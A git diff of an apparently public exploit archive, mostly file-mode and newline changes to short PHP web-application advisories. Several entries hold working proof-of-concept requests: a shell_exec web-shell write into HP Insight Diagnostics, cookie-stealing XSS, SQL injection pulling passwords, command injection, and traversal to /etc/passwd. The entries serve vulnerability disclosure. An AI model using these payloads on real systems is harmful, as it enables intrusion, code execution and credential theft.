-https://www.example.com/hpdiags/frontend2/commands/saveCompareConfig.php?filename=comparesurvey&target=winhardrive&device=&devicePath=C:/hp/hpsmh/data/htdocs/hpdiags/frontend2/help/&category=all&advanced=yes&leftFile=surveybase.xml&leftFileName=<%3f=shell_exec($_REQUEST[0])%3b%3f>&rightFile=survey.lastwebsession.xml&rightFileName=-&changesOnly=yes&overwrite=yes \ No newline at end of file +https://www.example.com/hpdiags/frontend2/commands/saveCompareConfig.php?filename=comparesurvey&target=winhardrive&device=&devicePath=C:/hp/hpsmh/data/htdocs/hpdiags/frontend2/help/&category=all&advanced=yes&leftFile=surveybase.xml&leftFileName=<%3f=shell_exec($_REQUEST[0])%3b%3f>&rightFile=survey.lastwebsession.xml&rightFileName=-&changesOnly=yes&overwrite=yes \ No newline at end of file diff --git a/platforms/php/webapps/38563.txt b/platforms/php/webapps/38563.txt old mode 100755 new mode 100644 index be4e3177a..c964eca5d --- a/platforms/php/webapps/38563.txt +++ b/platforms/php/webapps/38563.txt @@ -6,4 +6,4 @@ An attacker can exploit this vulnerability to obtain potentially sensitive infor HP Insight Diagnostics 9.4.0.4710 is vulnerable; other versions may also be affected. -https://www.example.com/hpdiags/frontend2/help/pageview.php?path=comparesurvey.html \ No newline at end of file +https://www.example.com/hpdiags/frontend2/help/pageview.php?path=comparesurvey.html \ No newline at end of file diff --git a/platforms/php/webapps/38565.txt b/platforms/php/webapps/38565.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/38567.txt b/platforms/php/webapps/38567.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/38568.txt b/platforms/php/webapps/38568.txt old mode 100755 new mode 100644 index 553732153..e9d27aed1 --- a/platforms/php/webapps/38568.txt +++ b/platforms/php/webapps/38568.txt @@ -4,4 +4,4 @@ The Ambience theme for WordPress is prone to a cross-site scripting vulnerabilit An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks. -http://www.example.com/wp-content/themes/ambience/thumb.php?src=<body onload=alert(/darksnipper/)>.jpg \ No newline at end of file +http://www.example.com/wp-content/themes/ambience/thumb.php?src=<body onload=alert(/darksnipper/)>.jpg \ No newline at end of file diff --git a/platforms/php/webapps/38569.txt b/platforms/php/webapps/38569.txt old mode 100755 new mode 100644 index a685781f4..2c56ef3e7 --- a/platforms/php/webapps/38569.txt +++ b/platforms/php/webapps/38569.txt @@ -17,4 +17,4 @@ Cookie: lang=; PHPSESSID=g4j89f6110r4hpl3bkecfpc7c1 Connection: keep-alive Content-Type: application/x-www-form-urlencoded Content-Length: 90 -host=localhost&user=root&pass=toor&name=lokboard&pass_key=1234";phpinfo();// \ No newline at end of file +host=localhost&user=root&pass=toor&name=lokboard&pass_key=1234";phpinfo();// \ No newline at end of file diff --git a/platforms/php/webapps/3857.txt b/platforms/php/webapps/3857.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/38570.txt b/platforms/php/webapps/38570.txt old mode 100755 new mode 100644 index 4ebf482b5..1515cc42c --- a/platforms/php/webapps/38570.txt +++ b/platforms/php/webapps/38570.txt @@ -4,4 +4,4 @@ ScriptCase is prone to an SQL-injection vulnerability because it fails to suffic Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. -http://www.example.com/scelta_categoria.php?categoria=[SQLi] \ No newline at end of file +http://www.example.com/scelta_categoria.php?categoria=[SQLi] \ No newline at end of file diff --git a/platforms/php/webapps/38571.txt b/platforms/php/webapps/38571.txt old mode 100755 new mode 100644 index c301dfe06..ac82f77ce --- a/platforms/php/webapps/38571.txt +++ b/platforms/php/webapps/38571.txt @@ -6,4 +6,4 @@ An attacker can exploit this issue to execute arbitrary PHP code within the cont mkCMS 3.6 is vulnerable; other versions may also be affected. -http://www.example.com/mkCMS/index.php?cmd=dir \ No newline at end of file +http://www.example.com/mkCMS/index.php?cmd=dir \ No newline at end of file diff --git a/platforms/php/webapps/38572.txt b/platforms/php/webapps/38572.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/38573.txt b/platforms/php/webapps/38573.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/38574.html b/platforms/php/webapps/38574.html old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/38577.txt b/platforms/php/webapps/38577.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/38578.txt b/platforms/php/webapps/38578.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/38579.txt b/platforms/php/webapps/38579.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/3858.php b/platforms/php/webapps/3858.php old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/38581.txt b/platforms/php/webapps/38581.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/38585.pl b/platforms/php/webapps/38585.pl index 707cc9ecb..e8b45782f 100755 --- a/platforms/php/webapps/38585.pl +++ b/platforms/php/webapps/38585.pl @@ -26,4 +26,4 @@ if( $res->is_success ) { print $res->content; } else { print $res->status_line, "\n"; -} \ No newline at end of file +} \ No newline at end of file diff --git a/platforms/php/webapps/38588.php b/platforms/php/webapps/38588.php old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/3859.txt b/platforms/php/webapps/3859.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/38590.txt b/platforms/php/webapps/38590.txt old mode 100755 new mode 100644 index 0bc7c292f..16c4409b4 --- a/platforms/php/webapps/38590.txt +++ b/platforms/php/webapps/38590.txt @@ -6,4 +6,4 @@ An attacker can exploit these issues to gain elevated privileges within the appl et-chat 3.07 is vulnerable; other versions may also be affected. -http://www.example.com/chat/?AdminRegUserEdit&admin&id=4 \ No newline at end of file +http://www.example.com/chat/?AdminRegUserEdit&admin&id=4 \ No newline at end of file diff --git a/platforms/php/webapps/38592.php b/platforms/php/webapps/38592.php old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/38594.txt b/platforms/php/webapps/38594.txt old mode 100755 new mode 100644 index 11ecffca6..71cbc4f76 --- a/platforms/php/webapps/38594.txt +++ b/platforms/php/webapps/38594.txt @@ -4,4 +4,4 @@ Barnraiser Prairie is prone to a directory-traversal vulnerability because it fa Remote attackers can use specially crafted requests with directory-traversal sequences ('../') to access arbitrary images in the context of the application. This may aid in further attacks. -http://www.example.com/get_file.php?avatar=..&width=../../../../../../../../usr/share/apache2/icons/apache_pb.png \ No newline at end of file +http://www.example.com/get_file.php?avatar=..&width=../../../../../../../../usr/share/apache2/icons/apache_pb.png \ No newline at end of file diff --git a/platforms/php/webapps/38596.txt b/platforms/php/webapps/38596.txt old mode 100755 new mode 100644 index fdbd8514d..7253574de --- a/platforms/php/webapps/38596.txt +++ b/platforms/php/webapps/38596.txt @@ -12,4 +12,4 @@ http://www.example.com/index.php?block_id=7&func=modify_instance&interface=%3Csc http://www.example.com/index.php?func=aliases&module=modules&name=%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E&type=admin -http://www.example.com/index.php?func=assignprivileges&module=privileges&tab=authsystem&tabmodule=%3Cscript%3Ealert%28document.cookie%29;%3C/script%3 \ No newline at end of file +http://www.example.com/index.php?func=assignprivileges&module=privileges&tab=authsystem&tabmodule=%3Cscript%3Ealert%28document.cookie%29;%3C/script%3 \ No newline at end of file diff --git a/platforms/php/webapps/38598.txt b/platforms/php/webapps/38598.txt old mode 100755 new mode 100644 index 0a04ac76a..b0cfbecdb --- a/platforms/php/webapps/38598.txt +++ b/platforms/php/webapps/38598.txt @@ -6,4 +6,4 @@ Attackers can exploit this issue to execute arbitrary commands in the context of ZamFoo 12.0 is vulnerable; other versions may also be affected. -http://www.example.com/cgi/zamfoo/zamfoo_do_restore_zamfoo_backup.cgi?accounttorestore=account&date=`command` \ No newline at end of file +http://www.example.com/cgi/zamfoo/zamfoo_do_restore_zamfoo_backup.cgi?accounttorestore=account&date=`command` \ No newline at end of file diff --git a/platforms/php/webapps/3860.txt b/platforms/php/webapps/3860.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/38605.txt b/platforms/php/webapps/38605.txt old mode 100755 new mode 100644 index 72ed36604..a563bb97b --- a/platforms/php/webapps/38605.txt +++ b/platforms/php/webapps/38605.txt @@ -6,4 +6,4 @@ An attacker may leverage this issue to execute arbitrary script code in the brow Nameko 0.10.146 and prior are vulnerable. -http://www.example.com/nameko.php?op=999&id=&colorset=VIOLET&fontsize=11%3B+%7D%3C%2Fstyle%3E%3Cscript%3Ealert%28document.cookie%29%3C%2Fscript%3E%3Cstyle%3EBODY+%7B+font-size%3A66 \ No newline at end of file +http://www.example.com/nameko.php?op=999&id=&colorset=VIOLET&fontsize=11%3B+%7D%3C%2Fstyle%3E%3Cscript%3Ealert%28document.cookie%29%3C%2Fscript%3E%3Cstyle%3EBODY+%7B+font-size%3A66 \ No newline at end of file diff --git a/platforms/php/webapps/38606.txt b/platforms/php/webapps/38606.txt old mode 100755 new mode 100644 index cd3036d43..91148a472 --- a/platforms/php/webapps/38606.txt +++ b/platforms/php/webapps/38606.txt @@ -4,4 +4,4 @@ WP Private Messages plugin for WordPress is prone to an SQL-injection vulnerabil Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. -http://www.example.com/wp-admin/profile.php?page=wp-private-messages/wpu_private_messages.php&wpu=reply&msgid=[Sql] \ No newline at end of file +http://www.example.com/wp-admin/profile.php?page=wp-private-messages/wpu_private_messages.php&wpu=reply&msgid=[Sql] \ No newline at end of file diff --git a/platforms/php/webapps/38607.txt b/platforms/php/webapps/38607.txt old mode 100755 new mode 100644 index cbf37f13b..fb1ebe721 --- a/platforms/php/webapps/38607.txt +++ b/platforms/php/webapps/38607.txt @@ -6,4 +6,4 @@ An attacker can exploit this issue to upload arbitrary code and execute it in th Atomy Maxsite versions 1.50 through 2.5 are vulnerable. -http://www.example.com/[path]/index.php?name=research&file=add&op=research_add \ No newline at end of file +http://www.example.com/[path]/index.php?name=research&file=add&op=research_add \ No newline at end of file diff --git a/platforms/php/webapps/38608.txt b/platforms/php/webapps/38608.txt old mode 100755 new mode 100644 index 8b4ce2127..d062a9738 --- a/platforms/php/webapps/38608.txt +++ b/platforms/php/webapps/38608.txt @@ -6,4 +6,4 @@ An attacker may leverage this issue to execute arbitrary script code in the brow Xorbin Analog Flash Clock 1.0 is vulnerable; other versions may also be affected. -http://www.example.com/wordpress/wp-content/plugins/xorbin-analog-flash-clock/media/xorAnalogClock.swf#?urlWindow=_self&widgetUrl=javascript:alert(1); \ No newline at end of file +http://www.example.com/wordpress/wp-content/plugins/xorbin-analog-flash-clock/media/xorAnalogClock.swf#?urlWindow=_self&widgetUrl=javascript:alert(1); \ No newline at end of file diff --git a/platforms/php/webapps/3861.txt b/platforms/php/webapps/3861.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/3862.txt b/platforms/php/webapps/3862.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/38621.txt b/platforms/php/webapps/38621.txt old mode 100755 new mode 100644 index 22c7ecea2..88605af53 --- a/platforms/php/webapps/38621.txt +++ b/platforms/php/webapps/38621.txt @@ -6,4 +6,4 @@ An attacker may leverage this issue to execute arbitrary script code in the brow Xorbin Digital Flash Clock 1.0 is vulnerable; other versions may also be affected. -http://www.example.com/wordpress/wp-content/plugins/xorbin-digital-flash-clock/media/xorDigitalClock.swf#?widgetUrl=javascript:alert(1); \ No newline at end of file +http://www.example.com/wordpress/wp-content/plugins/xorbin-digital-flash-clock/media/xorDigitalClock.swf#?widgetUrl=javascript:alert(1); \ No newline at end of file diff --git a/platforms/php/webapps/38624.txt b/platforms/php/webapps/38624.txt old mode 100755 new mode 100644 index ff7f945fe..91ae69e43 --- a/platforms/php/webapps/38624.txt +++ b/platforms/php/webapps/38624.txt @@ -4,4 +4,4 @@ WP Feed plugin for WordPress is prone to an SQL-injection vulnerability because Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. -http://www.example.com/wp-content/plugins/feed/news_dt.php?nid=[Sql] \ No newline at end of file +http://www.example.com/wp-content/plugins/feed/news_dt.php?nid=[Sql] \ No newline at end of file diff --git a/platforms/php/webapps/38625.txt b/platforms/php/webapps/38625.txt old mode 100755 new mode 100644 index 6f41496ef..0845a9dfe --- a/platforms/php/webapps/38625.txt +++ b/platforms/php/webapps/38625.txt @@ -4,4 +4,4 @@ The Category Grid View Gallery plugin for WordPress is prone to a cross-site-scr An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks. -http://www.example.com/wp-content/plugins/category-grid-view-gallery/includes/CatGridPost.php?ID=1172[xss] \ No newline at end of file +http://www.example.com/wp-content/plugins/category-grid-view-gallery/includes/CatGridPost.php?ID=1172[xss] \ No newline at end of file diff --git a/platforms/php/webapps/38628.txt b/platforms/php/webapps/38628.txt old mode 100755 new mode 100644 index cf2ca40b1..c0e137d34 --- a/platforms/php/webapps/38628.txt +++ b/platforms/php/webapps/38628.txt @@ -6,4 +6,4 @@ Attackers can exploit this issue to gain unauthorized access to the affected app HostBill 4.6.0 is vulnerable; other versions may also be affected. -www.example.com/includes/cpupdate.php?do=backup&filename=../templates_c/DB_Dump.txt&login_username=0&password=0 \ No newline at end of file +www.example.com/includes/cpupdate.php?do=backup&filename=../templates_c/DB_Dump.txt&login_username=0&password=0 \ No newline at end of file diff --git a/platforms/php/webapps/38629.txt b/platforms/php/webapps/38629.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/3863.txt b/platforms/php/webapps/3863.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/38630.html b/platforms/php/webapps/38630.html old mode 100755 new mode 100644 index 7be1bed2f..4c3c427db --- a/platforms/php/webapps/38630.html +++ b/platforms/php/webapps/38630.html @@ -9,4 +9,4 @@ phpVibe 3.1 is vulnerable; other versions may also be affected. http://www.example.com/phpVibe/index.php?com_handler=[EV!L] http://www.example.com/phpVibe/app/classes/language.php?LANGUAGE_DIR=[EV!L] http://www.example.com/phpVibe/app/classes/language.php?lang=[EV!L] -http://www.example.com/setup/application/views/displays/modules/backups/ \ No newline at end of file +http://www.example.com/setup/application/views/displays/modules/backups/ \ No newline at end of file diff --git a/platforms/php/webapps/38635.txt b/platforms/php/webapps/38635.txt old mode 100755 new mode 100644 index 6fe83f495..65dfc50e0 --- a/platforms/php/webapps/38635.txt +++ b/platforms/php/webapps/38635.txt @@ -6,4 +6,4 @@ Exploiting this issue could allow an attacker to compromise the application, acc iVote 1.0.0 is vulnerable; other versions may be affected. -http://www.example.com/iVote/details.php?id=1 union select 1,password,3,4 from settings \ No newline at end of file +http://www.example.com/iVote/details.php?id=1 union select 1,password,3,4 from settings \ No newline at end of file diff --git a/platforms/php/webapps/38638.txt b/platforms/php/webapps/38638.txt old mode 100755 new mode 100644 index 3f02a9326..35781dee0 --- a/platforms/php/webapps/38638.txt +++ b/platforms/php/webapps/38638.txt @@ -9,4 +9,4 @@ Mintboard 0.3 is vulnerable; other versions may also be affected. http://www.example.com/?login=3 (POST: name) http://www.example.com/?login=3 (POST: pass) http://www.example.com/?signup=3 (POST: name) -http://www.example.com/?signup=3 (POST: pass) \ No newline at end of file +http://www.example.com/?signup=3 (POST: pass) \ No newline at end of file diff --git a/platforms/php/webapps/38639.txt b/platforms/php/webapps/38639.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/3864.txt b/platforms/php/webapps/3864.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/38642.txt b/platforms/php/webapps/38642.txt old mode 100755 new mode 100644 index d0e60a707..320a412a3 --- a/platforms/php/webapps/38642.txt +++ b/platforms/php/webapps/38642.txt @@ -10,4 +10,4 @@ http://www.example.com/serendipity_admin_image_selector.php?serendipity%5Btextar &serendipity%5BadminAction%5D=208.100.0.117&serendipity%5BadminModule%5D=208.100.0.117 &serendipity%5Bstep%5D=default&serendipity%5Bonly_path%5D=208.100.0.117 -http://www.example.com/serendipity_admin_image_selector.php?serendipity%5Bhtmltarget%5D=%27%2Balert(0x000A02)%2B%27&serendipity%5Baction%5D=208.100.0.117&serendipity%5BadminAction%5D=208.100.0.117&serendipity%5BadminModule%5D=208.100.0.117&serendipity%5Bstep%5D=default&serendipity%5Bonly_path%5D=208.100.0.117 \ No newline at end of file +http://www.example.com/serendipity_admin_image_selector.php?serendipity%5Bhtmltarget%5D=%27%2Balert(0x000A02)%2B%27&serendipity%5Baction%5D=208.100.0.117&serendipity%5BadminAction%5D=208.100.0.117&serendipity%5BadminModule%5D=208.100.0.117&serendipity%5Bstep%5D=default&serendipity%5Bonly_path%5D=208.100.0.117 \ No newline at end of file diff --git a/platforms/php/webapps/38643.txt b/platforms/php/webapps/38643.txt old mode 100755 new mode 100644 index e70b5841a..7da286d40 --- a/platforms/php/webapps/38643.txt +++ b/platforms/php/webapps/38643.txt @@ -7,4 +7,4 @@ An attacker may leverage these issues to execute arbitrary script code in the br Pie Register 1.30 is vulnerable; other versions may also be affected. <?php echo $_POST['pass1'];?> -<?php echo $_POST['pass2'];?> \ No newline at end of file +<?php echo $_POST['pass2'];?> \ No newline at end of file diff --git a/platforms/php/webapps/38648.txt b/platforms/php/webapps/38648.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/38649.txt b/platforms/php/webapps/38649.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/3865.txt b/platforms/php/webapps/3865.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/38651.txt b/platforms/php/webapps/38651.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/38652.txt b/platforms/php/webapps/38652.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/38654.txt b/platforms/php/webapps/38654.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/38656.html b/platforms/php/webapps/38656.html old mode 100755 new mode 100644 index 3b2fa3792..9721f76f0 --- a/platforms/php/webapps/38656.html +++ b/platforms/php/webapps/38656.html @@ -12,4 +12,4 @@ PrestaShop 1.5.4 is vulnerable; other versions may also be affected. <img src="http://www.example.com/language/cart?add=&id_product=[Product ID]" width=0 height=0> </body> </head> -</html> \ No newline at end of file +</html> \ No newline at end of file diff --git a/platforms/php/webapps/38661.txt b/platforms/php/webapps/38661.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/38665.txt b/platforms/php/webapps/38665.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/38673.txt b/platforms/php/webapps/38673.txt old mode 100755 new mode 100644 index 992d9a05b..5a53b93fe --- a/platforms/php/webapps/38673.txt +++ b/platforms/php/webapps/38673.txt @@ -18,4 +18,4 @@ https://www.example.com/secprj/managechat.php?userto=<SCRIPT/XSS SRC="http://www Security-bypass: -https://www.example.com/secprj/manageuser.php?action=del&id=5 \ No newline at end of file +https://www.example.com/secprj/manageuser.php?action=del&id=5 \ No newline at end of file diff --git a/platforms/php/webapps/38674.txt b/platforms/php/webapps/38674.txt old mode 100755 new mode 100644 index a2ef0ae47..fb2eddbaa --- a/platforms/php/webapps/38674.txt +++ b/platforms/php/webapps/38674.txt @@ -4,4 +4,4 @@ The FlagEm plugin for WordPress is prone to a cross-site-scripting vulnerability An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks. -http://www.example.com/wp-content/plugins/FlagEm/flagit.php?cID=[Xss] \ No newline at end of file +http://www.example.com/wp-content/plugins/FlagEm/flagit.php?cID=[Xss] \ No newline at end of file diff --git a/platforms/php/webapps/38675.html b/platforms/php/webapps/38675.html old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/38676.txt b/platforms/php/webapps/38676.txt old mode 100755 new mode 100644 index f40d4f976..778cedfa0 --- a/platforms/php/webapps/38676.txt +++ b/platforms/php/webapps/38676.txt @@ -6,4 +6,4 @@ An attacker may leverage this issue to execute arbitrary script code in the brow Duplicator 0.4.4 is vulnerable; other versions may also be affected. -http://www.example.com/wp-content/plugins/duplicator/files/installer.cleanup.php?remove=1&package=%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E \ No newline at end of file +http://www.example.com/wp-content/plugins/duplicator/files/installer.cleanup.php?remove=1&package=%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E \ No newline at end of file diff --git a/platforms/php/webapps/38677.txt b/platforms/php/webapps/38677.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/38678.txt b/platforms/php/webapps/38678.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/38679.txt b/platforms/php/webapps/38679.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/3868.txt b/platforms/php/webapps/3868.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/38682.txt b/platforms/php/webapps/38682.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/38683.txt b/platforms/php/webapps/38683.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/38684.txt b/platforms/php/webapps/38684.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/38688.txt b/platforms/php/webapps/38688.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/38689.txt b/platforms/php/webapps/38689.txt old mode 100755 new mode 100644 index 837ed65c9..33f9ab38f --- a/platforms/php/webapps/38689.txt +++ b/platforms/php/webapps/38689.txt @@ -6,4 +6,4 @@ An attacker can exploit this issue to gain access to sensitive information that SilverStripe 3.0.3 is vulnerable; other versions may also be affected. -http://<X.X.X.X:Port>/Security/LoginForm?AuthenticationMethod=MemberAuthenticator&Email=<email>&Password=<password>&BackURL=%2Fadmin%2Fpages&action_dologin=Log+in \ No newline at end of file +http://<X.X.X.X:Port>/Security/LoginForm?AuthenticationMethod=MemberAuthenticator&Email=<email>&Password=<password>&BackURL=%2Fadmin%2Fpages&action_dologin=Log+in \ No newline at end of file diff --git a/platforms/php/webapps/3869.txt b/platforms/php/webapps/3869.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/38693.txt b/platforms/php/webapps/38693.txt old mode 100755 new mode 100644 index 7d130c471..243490fa9 --- a/platforms/php/webapps/38693.txt +++ b/platforms/php/webapps/38693.txt @@ -6,4 +6,4 @@ An attacker may leverage this issue to upload arbitrary files to the affected co Advanced Guestbook 2.4.3 is vulnerable; other versions may also be affected. -http://www.example.com.tw/guestbook/addentry.php \ No newline at end of file +http://www.example.com.tw/guestbook/addentry.php \ No newline at end of file diff --git a/platforms/php/webapps/38695.txt b/platforms/php/webapps/38695.txt old mode 100755 new mode 100644 index 9da920906..3686f37c2 --- a/platforms/php/webapps/38695.txt +++ b/platforms/php/webapps/38695.txt @@ -8,4 +8,4 @@ CakePHP 2.2.8 and 2.3.7 are vulnerable; other versions may also be affected. http://www.example.com/cakephp-2.3.7/theme/Test1/%2e.//%2e.//%2e.//%2e. //%2e.//%2e.//%2e.//%2e.//%2e.//%2e.//%2e.//%2e.//%2e./etc/passwd -http://www.example.com/cakephp-2.3.7/DebugKit/%2e.//%2e.//%2e.//%2e.// %2e.//%2e.//%2e.//%2e.//%2e.//%2e.//%2e.//%2e.//%2e./etc/passwd \ No newline at end of file +http://www.example.com/cakephp-2.3.7/DebugKit/%2e.//%2e.//%2e.//%2e.// %2e.//%2e.//%2e.//%2e.//%2e.//%2e.//%2e.//%2e.//%2e./etc/passwd \ No newline at end of file diff --git a/platforms/php/webapps/38697.txt b/platforms/php/webapps/38697.txt old mode 100755 new mode 100644 index f1d5f81d6..60a8b0d73 --- a/platforms/php/webapps/38697.txt +++ b/platforms/php/webapps/38697.txt @@ -6,4 +6,4 @@ An attacker can exploit this vulnerability to view files or execute arbitrary sc ACal 2.2.6 is vulnerable; other versions may also be affected. -http://www.example.com/calendar/embed/example/example.php?view=../../etc/passwd%00 \ No newline at end of file +http://www.example.com/calendar/embed/example/example.php?view=../../etc/passwd%00 \ No newline at end of file diff --git a/platforms/php/webapps/38698.html b/platforms/php/webapps/38698.html old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/38699.txt b/platforms/php/webapps/38699.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/3870.txt b/platforms/php/webapps/3870.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/38709.txt b/platforms/php/webapps/38709.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/38712.txt b/platforms/php/webapps/38712.txt old mode 100755 new mode 100644 index 03d896cab..3f5273da7 --- a/platforms/php/webapps/38712.txt +++ b/platforms/php/webapps/38712.txt @@ -10,4 +10,4 @@ http://www.example.com//view.php?go=userlist&ordered=1%27 [SQLi] http://www.example.com/view.php?go=userlist&ordered=1&usergroup=%22/%3E%3Cscript%3Ealert%281%29;%3C/script%3E [XSS] -http://www.example.com//view.php?go=userlist&ordered=1&usergroup="/><script>alert(1);</script> [XSS] \ No newline at end of file +http://www.example.com//view.php?go=userlist&ordered=1&usergroup="/><script>alert(1);</script> [XSS] \ No newline at end of file diff --git a/platforms/php/webapps/38727.txt b/platforms/php/webapps/38727.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/38728.txt b/platforms/php/webapps/38728.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/38729.txt b/platforms/php/webapps/38729.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/38737.txt b/platforms/php/webapps/38737.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/3874.txt b/platforms/php/webapps/3874.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/38740.txt b/platforms/php/webapps/38740.txt old mode 100755 new mode 100644 index 98d96b601..bfa70d5c8 --- a/platforms/php/webapps/38740.txt +++ b/platforms/php/webapps/38740.txt @@ -6,4 +6,4 @@ Successful exploits of this issue lead to disclosure of sensitive information wh http://www.example.com/AcoraCMS/Admin/top.aspx -<input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTQ4NjIxMDUxOQ9kFgJmD2QWAgIDD2QWAgIBD2QWCmYPFgIeBFRleHQFJERpZ2l0YWxTZWMgTmV0d29ya3MgV2Vic2l0ZWQCAQ8WAh8ABQpFbnRlcnByaXNlZAICDw8WAh8ABQt2NS40LjUvNGEtY2RkAgMPFgIfAAUgQW5vbnltb3VzIChQdWJsaWMgSW50ZXJuZXQgVXNlcilkAgQPDxYCHgdWaXNpYmxlaGRkZIL9u8OSlqqnBHGwtssOBV5lciAoCg" /></div> \ No newline at end of file +<input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTQ4NjIxMDUxOQ9kFgJmD2QWAgIDD2QWAgIBD2QWCmYPFgIeBFRleHQFJERpZ2l0YWxTZWMgTmV0d29ya3MgV2Vic2l0ZWQCAQ8WAh8ABQpFbnRlcnByaXNlZAICDw8WAh8ABQt2NS40LjUvNGEtY2RkAgMPFgIfAAUgQW5vbnltb3VzIChQdWJsaWMgSW50ZXJuZXQgVXNlcilkAgQPDxYCHgdWaXNpYmxlaGRkZIL9u8OSlqqnBHGwtssOBV5lciAoCg" /></div> \ No newline at end of file diff --git a/platforms/php/webapps/38744.txt b/platforms/php/webapps/38744.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/38745.txt b/platforms/php/webapps/38745.txt old mode 100755 new mode 100644 index 36cc5ddd1..2c8285ddd --- a/platforms/php/webapps/38745.txt +++ b/platforms/php/webapps/38745.txt @@ -8,4 +8,4 @@ Xibo 1.4.2 is vulnerable; other versions may also be affected. POST: /index.php?p=layout&q=add&ajax=true -Data: layoutid=0&layout=Gimppy%3Cimg+src%3D42+onerror%3D'alert(%22InfoSec42%22)'%3E&description=%3Ciframe+src%3D'http%3A%2F%2Fsecurityevaluators.com'+width%3D1000+height%3D1000%3C%2Fiframe%3E&tags=&templateid=0 \ No newline at end of file +Data: layoutid=0&layout=Gimppy%3Cimg+src%3D42+onerror%3D'alert(%22InfoSec42%22)'%3E&description=%3Ciframe+src%3D'http%3A%2F%2Fsecurityevaluators.com'+width%3D1000+height%3D1000%3C%2Fiframe%3E&tags=&templateid=0 \ No newline at end of file diff --git a/platforms/php/webapps/38746.html b/platforms/php/webapps/38746.html old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/38748.txt b/platforms/php/webapps/38748.txt old mode 100755 new mode 100644 index 7cb0ec030..9f7e6bc51 --- a/platforms/php/webapps/38748.txt +++ b/platforms/php/webapps/38748.txt @@ -4,4 +4,4 @@ dBlog CMS is prone to an SQL-injection vulnerability because it fails to suffici Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. -http://www.example.com/dblog/storico.asp?m=[Sql Injection] \ No newline at end of file +http://www.example.com/dblog/storico.asp?m=[Sql Injection] \ No newline at end of file diff --git a/platforms/php/webapps/3875.txt b/platforms/php/webapps/3875.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/38750.txt b/platforms/php/webapps/38750.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/38753.html b/platforms/php/webapps/38753.html old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/38754.txt b/platforms/php/webapps/38754.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/38755.txt b/platforms/php/webapps/38755.txt old mode 100755 new mode 100644 index e9dded6e0..18653e03c --- a/platforms/php/webapps/38755.txt +++ b/platforms/php/webapps/38755.txt @@ -6,4 +6,4 @@ Exploiting this issue could allow an attacker to compromise the application, acc mukioplayer4wp 1.6 is vulnerable; other versions may also be affected. -http://www.example.com/videos/wp-content/plugins/mukioplayer-for-wordpress/php-scripts/get.php?cid=71866877%27 \ No newline at end of file 